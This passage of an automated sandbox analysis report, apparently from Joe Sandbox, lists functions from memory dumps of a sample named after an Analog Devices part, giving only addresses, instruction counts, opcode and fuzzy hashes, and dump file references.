Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63d81a5c394abbf777040390f8715be9dca067f2db0caf46644854849fb4af29
Instruction ID: b5f62e10fe77dfdae3163124ce55cc68007e7f55dee09fc7c46f1fbceb78387f
Opcode Fuzzy Hash: 63d81a5c394abbf777040390f8715be9dca067f2db0caf46644854849fb4af29
Instruction Fuzzy Hash: 5801A9B9B041245FCF16B7B878954FE7F769B89514B000559D719EB352CF300E0287E6

Function 0B24B810 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34d5c5f464dddfe0d0ecb495ba75834d1acb712ff55000523c9a47f660c0e529
Instruction ID: 6c7a22e2ee295a338ae9f675a28461a22935fd5b6f349b5f38d6e57bfe3028f7
Opcode Fuzzy Hash: 34d5c5f464dddfe0d0ecb495ba75834d1acb712ff55000523c9a47f660c0e529
Instruction Fuzzy Hash: 1411F7B4D29208DFCB08DFA9C584AADBBF9FB4D310F109995D418A7715D7B0DA40CB80

Function 0B248560 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d35665e92a30493a77fe8ff247d45884d792da323fe9e15ec12bd22f33230840
Instruction ID: e50cc76b5f380c9dff325289143e093a23168ddebe8444dd9f4db56e1b6231aa
Opcode Fuzzy Hash: d35665e92a30493a77fe8ff247d45884d792da323fe9e15ec12bd22f33230840
Instruction Fuzzy Hash: 75115EB4E25209DFCB48DFA9D58419EBBF2BF88300F20C56AC405E7354E7709A00CB41

Function 0B2484A0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c68a27a487ba11f45b2c96d286fbde4b13800ce64d2bf2fa6c2006768c956fef
Instruction ID: 63ecb559ecebaa74f98588a551dd5691830f2b857258b134aaa60b5d14e9992e
Opcode Fuzzy Hash: c68a27a487ba11f45b2c96d286fbde4b13800ce64d2bf2fa6c2006768c956fef
Instruction Fuzzy Hash: 351121B4D25219DFCB48DFA9D58459EFBF5FF88200F10C4AAC519E7614E7709A00CB50

Function 0B24BCA0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abefbb50638d4c3158284dd63b19d3e5d794dda77536bd1ca400fbb35e1f234e
Instruction ID: 16af92c3849db1a47c54743c662b02739310f2623e916067216e94f5da026613
Opcode Fuzzy Hash: abefbb50638d4c3158284dd63b19d3e5d794dda77536bd1ca400fbb35e1f234e
Instruction Fuzzy Hash: A411C2B1D016589BEB1CCFABC9847DEFAF6AFC8300F14C06AD41976264DB7509858F94

Function 051FDC8A Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13eadd107bb3ca1ed969082c38c187773a9892005cd7056e2cddc370372b574e
Instruction ID: 0c37f126ae08b7cb9ca5c6650b800751d416269eb314da7df8b6529dadfec92c
Opcode Fuzzy Hash: 13eadd107bb3ca1ed969082c38c187773a9892005cd7056e2cddc370372b574e
Instruction Fuzzy Hash: 8311A1B0A04118CBDB28DFB4E1943BD7AB3EF84304F14482DD602A6290DF788980CFA5

Function 0B24BB00 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0e2cd3d85e8a6c765154ca50d650351889a70a29876b07dbb633f1a11c2f985
Instruction ID: b42f8b6ac3e6ae1dbfc30e59aeb1e397f00a29e04880fff02d17b946de9a6a04
Opcode Fuzzy Hash: b0e2cd3d85e8a6c765154ca50d650351889a70a29876b07dbb633f1a11c2f985
Instruction Fuzzy Hash: AE114070E18108EFCB08DF64D594AACBBB9FB4A300F1091A9D825A7769D7B1D941CF41

Function 0B24CB1A Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f76a5181dc35f190d5ed9a7f5ecfa4ba022d9b13504b577fbe269c5d0335a620
Instruction ID: 60db2889e7c0faca34bc5c4cd3473508edbffaf1c35c7f79734df2da93ce623f
Opcode Fuzzy Hash: f76a5181dc35f190d5ed9a7f5ecfa4ba022d9b13504b577fbe269c5d0335a620
Instruction Fuzzy Hash: ED015E74A59248EFC708DFA8C584AADBFF5EF49300F15C098D4099B265D7709E44DF01

Function 0B246728 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17495737f2d36cb535ce8dd8dfa0868d5252e8d884b07818939d26e97611f903
Instruction ID: 415c8ff8adc1ab13738ed8771a0eb67dacb430af4b786b5e107ff9e396f70ae6
Opcode Fuzzy Hash: 17495737f2d36cb535ce8dd8dfa0868d5252e8d884b07818939d26e97611f903
Instruction Fuzzy Hash: 321112B4E15109DFCB48CFE9D6855AEBBF1EB89300F10C1A6D404E3754D7745A409B91

Function 051FBF60 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84745d77387ee9cb4e05916b17e9cd9c0be275dae883ead12eeecf908e7e513c
Instruction ID: 6cab852dfab9ae6952ef29fc146105dbefd2ea5b3727239cea9ecc3ad7051de2
Opcode Fuzzy Hash: 84745d77387ee9cb4e05916b17e9cd9c0be275dae883ead12eeecf908e7e513c
Instruction Fuzzy Hash: 8B015E31B142089FDB189B29C858AAE7BF6AF8C700F114469E502E73A1CFB59C019B91

Function 051FAA4B Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2810f80028ed3507b602694eff7ad3d111e9ce5bd51810a6eb49109e1873f0c2
Instruction ID: 662946cdddd260b5c498e779d5684a86650b04c43087a52ab27d36493b2d5e39
Opcode Fuzzy Hash: 2810f80028ed3507b602694eff7ad3d111e9ce5bd51810a6eb49109e1873f0c2
Instruction Fuzzy Hash: AE01A7303042408FC715DB28D540D66B7B6FFC5211B28C5AEE149CB265DB39DC46CB60

Function 0B24CAA2 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f4ae7665bee86ab0e5f676bf2fa0f3a5a1a32eff245255be8cf91366609101c
Instruction ID: 1ad617800c275e1b57562f4c2a137acafdc0216ec6f129065e45060f1a203d25
Opcode Fuzzy Hash: 8f4ae7665bee86ab0e5f676bf2fa0f3a5a1a32eff245255be8cf91366609101c
Instruction Fuzzy Hash: 1301DB7082E248DFC708CF69C8809E9BBF8EF4A700F0491A9D4199B662C7B09E48DB40

Function 0B245F70 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5bd2e08fdb12cc101c1a67216f3e7c6e7a888009c7a83a78648f9fc66d4f35c
Instruction ID: 158cda14e6ec6727c874b4d89390ec17dcd22119ba617247a95dab2b1444101f
Opcode Fuzzy Hash: a5bd2e08fdb12cc101c1a67216f3e7c6e7a888009c7a83a78648f9fc66d4f35c
Instruction Fuzzy Hash: 04018CB4E15209DFCB48CFA9D5405AEFBF6FB99300F11C46AD859A3354EB709A10CB41

Function 0B248658 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b475df4e6663a275907d92c69b9961ffa6a95e2bf47dd21c4595d4744c548c67
Instruction ID: f957ef3f40f485097d1667d3f5d344b0cdebff19cd1aba0c76a52e10d8c6c1b4
Opcode Fuzzy Hash: b475df4e6663a275907d92c69b9961ffa6a95e2bf47dd21c4595d4744c548c67
Instruction Fuzzy Hash: DC018F74E29208DFCB88CFB8D54569DBBF1AB8A210F28C0AAC40897765D7348B44CF05

Function 051FDD98 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee346e6167039487ccabe460ae2d641b8ed7ee0a57c6ae0485e10dc398f7799f
Instruction ID: c414cd4c19ee042f41258102c3fbd8732936e6eacc9fafacc474d58fa6fac05b
Opcode Fuzzy Hash: ee346e6167039487ccabe460ae2d641b8ed7ee0a57c6ae0485e10dc398f7799f
Instruction Fuzzy Hash: E3014F75B005188BCF14EFA8E4946FDBB72EB88765F181429D601B7390DB349C86CB91

Function 051FDD87 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84bcf3d64cece4a14feba07feadb5dec6601e6ea3332fd341f7f9500239418c5
Instruction ID: c14ddb4082094ed464d3ffbcbc20ea19857ce492b05cb345123b1ba50230b93e
Opcode Fuzzy Hash: 84bcf3d64cece4a14feba07feadb5dec6601e6ea3332fd341f7f9500239418c5
Instruction Fuzzy Hash: 97012CB9B005188BCF28EFA8E0947FDBB72EB88765F14142AD601B7390DB345885CB91

Function 051FAA58 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c39904572236bf591793be134f499b47782f0e8829e80e2dc25867442af7d57d
Instruction ID: 9cd14f03c96c0ff257c0cde319e6d3bcb974845e5071db547b1893401b94c7c0
Opcode Fuzzy Hash: c39904572236bf591793be134f499b47782f0e8829e80e2dc25867442af7d57d
Instruction Fuzzy Hash: 91016D352002008FC718DA29D940E26B3EAFF85260B68896AE60AC7264DB75EC46CB60

Function 051FF210 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53e6f933c6078bb90455df840286d70a10bddd248dbe1b902649fc4e3107f674
Instruction ID: bca39232bcf8788892188cca111513e91978da86573f4a14d2f6bf452893e05e
Opcode Fuzzy Hash: 53e6f933c6078bb90455df840286d70a10bddd248dbe1b902649fc4e3107f674
Instruction Fuzzy Hash: 8CF0BB75B001185B8F15B7B878544BFBBBADFC8614B000129D705AB341CF300E0287D9

Function 051F8DDC Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55f91e9669ac41c46dd7be76a36e8db02077eeb325bfc7d10a452b01b6809259
Instruction ID: 23ac47a1115a501f6c506715931566e0d713dfe9b601aab3ca62c355fc6dedc5
Opcode Fuzzy Hash: 55f91e9669ac41c46dd7be76a36e8db02077eeb325bfc7d10a452b01b6809259
Instruction Fuzzy Hash: 1AF02B723041187BCB156E7998808BF3FEBDBC93107044816FB1686252CF719C5153E0

Function 0B24CAB0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09ffa426aceab53a8aeab1739783846ea4c8774f1d07b9681a181a6b3a132d22
Instruction ID: bd1a9c192158519df4bad9eb383aca3663d78a00b2fa34ec0685ca5dd61a9450
Opcode Fuzzy Hash: 09ffa426aceab53a8aeab1739783846ea4c8774f1d07b9681a181a6b3a132d22
Instruction Fuzzy Hash: EBF08C7092E118DBC708CF59C5809F9BBF9EB49700F04D1A4D4195B651C7B09E48EB80

Function 0B248668 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 498a0ecd614040879884d31bb05f0bd5196857073263fa2df94799ef4ec515f2
Instruction ID: da58548730d530a6a545da5da4e9ba72a605c2c61e60b8627c01f2be09509b4d
Opcode Fuzzy Hash: 498a0ecd614040879884d31bb05f0bd5196857073263fa2df94799ef4ec515f2
Instruction Fuzzy Hash: 7001AF74E25108DFCB88CFA9D68529DBBF6EB89300F24D0AAC408A3754EB309B408B05

Function 0B24E72E Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e154c7dd5f20c75ae6c2705994e1e03c2bb5fd2ba8c59a83bb91957c750ec501
Instruction ID: f8ea82dd99175c8c081ecc337a6db2023c9265fb4088bf104accff36bae771b0
Opcode Fuzzy Hash: e154c7dd5f20c75ae6c2705994e1e03c2bb5fd2ba8c59a83bb91957c750ec501
Instruction Fuzzy Hash: FD015E74914204DFD758EF18D584A6DBBBAFB08300F06D095E42997271D770AE80CF42

Function 051FCE2F Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 093fbb22957420afb004d92643ec7144013677c76c663652652e1a276efcd903
Instruction ID: b7c47e4ddb8e5b20545c2de251219c78c4dfc776fa9be3cc7912a80e65540943
Opcode Fuzzy Hash: 093fbb22957420afb004d92643ec7144013677c76c663652652e1a276efcd903
Instruction Fuzzy Hash: 89F01275E042086BCB24DB69D4445DEBBF5EFC8314F05C16AD919D3241E73499448BD1

Function 051FF430 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 089ca6787833789fedd61d90b6f4e56a2ee085d72fdc52c5489b7317bf1188b7
Instruction ID: e9277a5307b5b3e6d6b0dc8e9a7f675bb9826bd6eec4c128ee9ff95a404a579a
Opcode Fuzzy Hash: 089ca6787833789fedd61d90b6f4e56a2ee085d72fdc52c5489b7317bf1188b7
Instruction Fuzzy Hash: 5CF03071B002586FCB08DBB9A8545AEBBFBDB85250B50847AD509D3246EF309D068790

Function 0B248884 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ced19a1a1ca39015f55a6c65b31b5ffbd7a8951d889b767fc0d21fcedd8fd7f4
Instruction ID: eb2b5f73f6f1fc61ecbd2e4304d3e597154a4c533650ed758e1ffb3ded432e09
Opcode Fuzzy Hash: ced19a1a1ca39015f55a6c65b31b5ffbd7a8951d889b767fc0d21fcedd8fd7f4
Instruction Fuzzy Hash: 0DF0CDB5C292489FC744DBB8C495698BFF0EB15601F4484DBD884DB7A2E339D600CF02

Function 0B247070 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79a807fffd885ab0dc03ae00734ae06c5ffc2cf310dcd9eba2e5f3c068265afb
Instruction ID: 36c45312e447ab47c18e986a1856a23b57177fe5edbc17b48cf6ca0ff58bbbc9
Opcode Fuzzy Hash: 79a807fffd885ab0dc03ae00734ae06c5ffc2cf310dcd9eba2e5f3c068265afb
Instruction Fuzzy Hash: C5F0F4B8D162099FCB54DFA8C5456AEFBF5FB48300F00846AD818A3390EB755A00CF51

Function 051FDDC7 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e704f8992e39bc8817a002474a706f8615f1aea7352d0dec4fc5bdbcafc124c3
Instruction ID: 9c2e1c82703c6df1c988e0d01b4517c281a964d006f622b16ba3725b59708053
Opcode Fuzzy Hash: e704f8992e39bc8817a002474a706f8615f1aea7352d0dec4fc5bdbcafc124c3
Instruction Fuzzy Hash: 37F05E75B001188BCF14EFA8E4886EC7B72EFC8365F18142AD205B7351DF349886CB91

Function 051FCCA8 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26429108d634e869048c9bb1719abd57bac7d2bd187b994f5c3395dc2d177c30
Instruction ID: 2133ab5d09790e50f62cb6e11d55895d211657457c3c38b7e54db0e89e66c4b1
Opcode Fuzzy Hash: 26429108d634e869048c9bb1719abd57bac7d2bd187b994f5c3395dc2d177c30
Instruction Fuzzy Hash: 1BF027323081846FCB079E19A800A9A7FE69F8A310F08804AF55CC7262CA758C11D760

Function 051FDCE5 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b6323b449727493a83d9c845c72255157047ed6d23ac6685440d35179f10465
Instruction ID: cc43d1fe9a955b00383853d397ae6e29153cc6407626a5e0a17abdfb0df7891c
Opcode Fuzzy Hash: 7b6323b449727493a83d9c845c72255157047ed6d23ac6685440d35179f10465
Instruction Fuzzy Hash: 12F030B0A04209CBEB18DBB5E0553BD7AB3AF84354F108829D61296190DF748880DFA1

Function 051F8F1C Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da8a68bd453ddeaae81da43c3446cb58072a7342d39057a8143269fe258db34f
Instruction ID: d79c760b2fad18cff5c571260b0f17ba2ae858346c89a884f1e88c350a50c902
Opcode Fuzzy Hash: da8a68bd453ddeaae81da43c3446cb58072a7342d39057a8143269fe258db34f
Instruction Fuzzy Hash: A1E092702043056B86389A25A884C37B7AEEB853503104919EA4A83611DB31E846C7A5

Function 0B24BF37 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3d3636f52f21c75e6527611d0831d5e35364503ec388bc8a5b155e7191023b3
Instruction ID: 3329f2c121884b57ce0005ed3f46bb430b6e2f152470169dc43fd7deb76b6e68
Opcode Fuzzy Hash: e3d3636f52f21c75e6527611d0831d5e35364503ec388bc8a5b155e7191023b3
Instruction Fuzzy Hash: B7011974814269CFDB24CF68D888B8CBBB5FF45310F0495D6D80A7B295D770AA84CF21

Function 051FF42B Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b5883efdb6cf59efaad1db6ccd585e2051747ffeec0df8db7afa82aa08ea4f8
Instruction ID: 09fa0ca0f9834ad7a2a4ce9b5a8e211320991a0287ee26a6052e884cc52a6ef5
Opcode Fuzzy Hash: 2b5883efdb6cf59efaad1db6ccd585e2051747ffeec0df8db7afa82aa08ea4f8
Instruction Fuzzy Hash: D0E01AB2B001146B9B08DEB9A8805BFBBFBDBC4610B50807BD608E3205EF319D468780

Function 0B24BD36 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1115df58d6706851fbaf26f7e09fda87fa4a2f8a806fb58ec90bf97e483f4482
Instruction ID: 9dc55534a8b776b68e4da0ff00115369a8270be983f51baa9385cda717ace86a
Opcode Fuzzy Hash: 1115df58d6706851fbaf26f7e09fda87fa4a2f8a806fb58ec90bf97e483f4482
Instruction Fuzzy Hash: E7F03035919218CFC708CF58E8945ECB7B9FB4A712F405496E62EAB651C331D940CF11

Function 0B24A3E1 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857064657.000000000B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b240000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 230fd081a1f92a51c3e39b43fe190da32f6813562c97f17140517409d18d00a8
Instruction ID: a94e481744017e25925a7879d7db515c20e22796660b7213cbf51b642147a34d
Opcode Fuzzy Hash: 230fd081a1f92a51c3e39b43fe190da32f6813562c97f17140517409d18d00a8
Instruction Fuzzy Hash: 88F05EB0C113199FCB19DFA8C5456AEBFB0FB05320F108AADE850A7295E7719581DB85

Function 051FCCB8 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcaa41d93a0a5b25e6484e2b8e11b04ea5964b2a3aa1abbec5331e3079328912
Instruction ID: 0eb5ea30afa25bcb4afcf24ce75bdc8b335affe292f073d9749e44220582a6f6
Opcode Fuzzy Hash: fcaa41d93a0a5b25e6484e2b8e11b04ea5964b2a3aa1abbec5331e3079328912
Instruction Fuzzy Hash: 9CE092322041496BCB059E4AE800E9FBFEEEFC9320B04851AF959C3251CA719851A7A1

Function 051FCBB4 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844686344.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_51f0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e896f17ae05ffe48acd6370067e92b371bd7609b43919a068c3043aa2502a398
Instruction ID: 5a41ebd8b22c25d96a09c66c0ce4832b0f6ee70af3059f369a92198329b2c4d6
Opcode Fuzzy Hash: e896f17ae05ffe48acd6370067e92b371bd7609b43919a068c3043aa2502a398
Instruction Fuzzy Hash: 75F0A47894821ADFDB04DF94D5909ADFBF1BB88304F118595D905BB311C770AD40DFA0

